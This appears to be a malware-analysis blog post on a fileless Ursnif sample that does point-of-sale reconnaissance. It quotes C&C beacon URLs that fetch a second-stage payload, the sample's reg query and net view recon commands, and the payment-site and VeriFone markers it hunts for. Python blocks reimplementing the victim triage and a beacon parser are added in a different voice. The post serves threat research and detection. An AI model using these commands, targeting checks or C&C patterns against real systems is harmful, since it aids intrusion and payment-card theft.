2015-07-05 - Fileless Reco
A fileless Ursnif doing some POS focused reco
Mission Impossible via Brixe63
At the beginning of June, I noticed a "different" Angler pass.
No drop, and Ursnif callbacks.
FileLess Angler Pass and Ursnif Callback
Mon, 01 Jun 2015 14:48:06 GMT
Ursnif sent to Bedep infected VM
2014-11-07
C&C calls in November 2014:
GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1859056880&type=1
200 OK (text/html)
GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1039729551&type=505
200 OK (text/html) < 2ndStage payload
What is new in that June pass is the fileless execution of this Ursnif. In that context, seeing it run a net view and a registry CurrentVersion\Uninstall check
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName > C:\Users\[REDACTED]\AppData\Local\Temp\28096234.TMP"
cmd /C "net.exe view > C:\Users\[REDACTED]\AppData\Local\Temp\28097562.TMP"
before calling the C&C made me think this might be reconnaissance.
XTEA-decoded from the PCAP, the sample I got was:
a619632af465759a3d3d45f39f988c3f
Running it manually, I got it to grab (the &type=505 call) an Andromeda.
Fileless Ursnif calling C&C, Grabbing Andromeda.
Andromeda Calling home.
On deeper inspection, it appears that this Ursnif is doing these kinds of checks:
Case one:
- POS/SALE/STORE in the net view output
- some URLs in the cache:
choiceadvantage.com
uhauldealer.com
secure-booker.com
teletracker.com
wupos.westernunion.com
pay1.plugnpay.com
secure.paymentech.com/iterminal/
Case two:
- some entries in the registry:
VeriFone (advertises itself as the "global leader in secure electronic POS solutions")
(there are two strings, Citrix and XenApp, but they do not seem to be directly used)
Case three:
- none of these, so a "lower value" (for them) machine.
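To make the triage above concrete, here is an added example (my own code, not the malware's and not from this post) that replays the same three checks over constructed sample output: a fake `net view` listing, a fake `reg query ... /s /v DisplayName` dump, and a handful of hypothetical cached URLs. The grouping into cases follows the list above; the plain case-insensitive substring matching is an assumption about how the sample compares strings, not something the post confirms. A defender can point the same functions at real output from a host to see which "case" it would have landed in.

```python
import re
from typing import Dict, List, Tuple

# Markers the post says the fileless Ursnif looks for.
NETVIEW_MARKERS = ("POS", "SALE", "STORE")
CACHE_URL_MARKERS = (
    "choiceadvantage.com",
    "uhauldealer.com",
    "secure-booker.com",
    "teletracker.com",
    "wupos.westernunion.com",
    "pay1.plugnpay.com",
    "secure.paymentech.com/iterminal/",
)
REGISTRY_MARKERS = ("verifone",)

# Constructed `net view` output (not from the post's VM): one POS-looking
# host and one ordinary file server.
SAMPLE_NET_VIEW = """Server Name            Remark
-------------------------------------------------------------------------------
\\\\FILESRV01             Shared files
\\\\POS-LANE-02           Lane 2 register
The command completed successfully.
"""

# Constructed output of `reg query HKLM\...\Uninstall /s /v DisplayName`
# (hypothetical product GUIDs and names).
SAMPLE_REG_QUERY = """HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{11111111-2222-3333-4444-555555555555}
    DisplayName    REG_SZ    Mozilla Firefox 38.0.5 (x86 en-US)

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{66666666-7777-8888-9999-000000000000}
    DisplayName    REG_SZ    VeriFone VX Terminal Driver
"""

# Constructed browser URL-cache entries (hypothetical).
SAMPLE_CACHE = [
    "https://www.example.com/",
    "https://secure.paymentech.com/iterminal/login.aspx",
]


def parse_net_view(output: str) -> List[str]:
    """Pull host names (lines starting with two backslashes) out of `net view` output."""
    return re.findall(r"^\\\\(\S+)", output, flags=re.MULTILINE)


def parse_display_names(output: str) -> List[str]:
    """Pull the DisplayName REG_SZ values out of a recursive `reg query` dump."""
    names = []
    for line in output.splitlines():
        m = re.match(r"\s*DisplayName\s+REG_SZ\s+(.+?)\s*$", line)
        if m:
            names.append(m.group(1))
    return names


def classify_host(net_view_out: str, reg_query_out: str,
                  cached_urls: List[str]) -> Tuple[int, Dict[str, List[str]]]:
    """Return (case, hits): case 1 = net view / URL-cache hit, 2 = registry hit, 3 = nothing."""
    hits: Dict[str, List[str]] = {"netview": [], "cache": [], "registry": []}
    for host in parse_net_view(net_view_out):
        if any(m in host.upper() for m in NETVIEW_MARKERS):
            hits["netview"].append(host)
    for url in cached_urls:
        if any(m in url.lower() for m in CACHE_URL_MARKERS):
            hits["cache"].append(url)
    for name in parse_display_names(reg_query_out):
        if any(m in name.lower() for m in REGISTRY_MARKERS):
            hits["registry"].append(name)
    if hits["netview"] or hits["cache"]:
        case = 1
    elif hits["registry"]:
        case = 2
    else:
        case = 3
    return case, hits


if __name__ == "__main__":
    case, hits = classify_host(SAMPLE_NET_VIEW, SAMPLE_REG_QUERY, SAMPLE_CACHE)
    print("case", case, hits)
```

Note that a bare substring match on "POS" or "STORE" also fires on names like "REPOSITORY" or "DATASTORE", so if you use this to estimate how many of your own hosts would look "interesting" to the sample, expect some over-counting.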
I made some modifications to my system to fall into case one:
Trying to get the attention of the Fileless Ursnif
It then dropped 76c240311df959961200a20f52b4026c, which appears to be a signed DLL.
Signed Dll dropped by the Fileless Ursnif
Conclusion: another smart use of the fileless capabilities of Angler.
Side Note:
It seems type 666 and type 922 are other calls accepted by the C&C (one of them might be the VeriFone case).
Crafted C&C Calls - note: type 666 and 922
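For anyone wanting to pick these beacons out of proxy or Zeek logs, here is an added example (my own code, not from this post or from the malware) that recognises the callback pattern seen in every capture above: the fixed parameter set user/id/ver/os/os2/host/k/type, a 32-hex-character user value, and the `type` value that tells check-in (1) from second-stage request (505). The URLs in the sample list are the ones quoted in this post (the September one is assembled from the C&C domain and path given in the update); the last one is a constructed benign request to show the filter rejecting it. The labels for 666 and 922 only record that the C&C accepts them; their purpose is not confirmed, and the os/os2/host values are passed through without interpretation.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Parameter set common to all the Ursnif beacons quoted in the post.
BEACON_PARAMS = {"user", "id", "ver", "os", "os2", "host", "k", "type"}

# `type` values mentioned in the post. 666/922 are only known to be accepted.
TYPE_LABELS = {
    "1": "check-in",
    "505": "second-stage request",
    "666": "accepted by C&C, purpose unconfirmed",
    "922": "accepted by C&C, purpose unconfirmed",
}

# URLs from the post (defanged with a space before the TLD, as in the post)
# plus one constructed benign request that must not match.
SAMPLE_URLS = [
    "http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1859056880&type=1",
    "http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1039729551&type=505",
    "http://lokingforrealest .net/yuppi/?user=c54acfbc9b5eef3b729f4025323a731c&id=19&ver=119&os=170393861&os2=512&host=0&k=88401496&type=505",
    "http://www.example.com/photoLibrary/?user=alice&id=1",
]


def refang(url: str) -> str:
    """Undo the 'domain .tld' defanging used in the post so urlsplit sees a real host."""
    return url.replace(" .", ".")


def parse_beacon(url: str) -> Optional[Dict[str, str]]:
    """Return the beacon fields if `url` matches the Ursnif callback shape, else None."""
    parts = urlsplit(refang(url))
    query = parse_qs(parts.query, keep_blank_values=True)
    if not BEACON_PARAMS <= set(query):
        return None
    fields = {k: query[k][0] for k in sorted(BEACON_PARAMS)}
    # Every sample carries a 32-hex-char `user`; anything else is not this family.
    if not re.fullmatch(r"[0-9a-f]{32}", fields["user"]):
        return None
    fields["c2_host"] = parts.hostname or ""
    fields["c2_port"] = str(parts.port or (443 if parts.scheme == "https" else 80))
    fields["path"] = parts.path
    fields["label"] = TYPE_LABELS.get(fields["type"], "unknown type")
    return fields


def triage(urls: List[str]) -> List[Dict[str, str]]:
    """Keep only the URLs that look like Ursnif beacons, with their fields decoded."""
    return [b for b in (parse_beacon(u) for u in urls) if b is not None]


if __name__ == "__main__":
    for beacon in triage(SAMPLE_URLS):
        print(beacon["c2_host"], beacon["c2_port"], beacon["path"],
              "type", beacon["type"], "->", beacon["label"])
```

The parameter-set check is deliberately strict: a URL missing any one of the eight names is discarded, which keeps ordinary photo-gallery or tracking URLs from matching on `user` and `id` alone. Loosen it only if you have a capture showing the family dropping parameters.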
A Fiddler capture is in the package for those who can decrypt the traffic based on the key (I'd be happy to hear about it).
Here is a package (multiple samples/pcap/fiddler)
Fileless Angler EK Pass (PCAP associated with the first screenshot)
[Update : 2015-09-04]
It's being pushed via Bedep these days:
Fileless Ursnif pushed via Bedep, but again no drop on disk (a Bedep method new to me) 2015-09-04
C&C : lokingforrealest.net (82.211.31.126)
/yuppi/?user=c54acfbc9b5eef3b729f4025323a731c&id=19&ver=119&os=170393861&os2=512&host=0&k=88401496&type=505
31400 | 82.211.0.0/18 | ACCELERATED | DE | kundenbetreuung.org | IP-Projects GmbH & Co. KG
[/edit]
Thanks :
Will Metcalf, Horgh_RCE and FoxIT for help/inputs.
Post Publication Readings :
Threat actor leverages windows zero-day exploit in payment card data attacks - 2016-05-10 - FireEye
PowerSniff Malware Used in Macro-based Attacks - 2016-03-11 - Palo Alto
Angler Exploit Kit Used to Find and Infect PoS Systems - 2015-07-27 - TrendMicro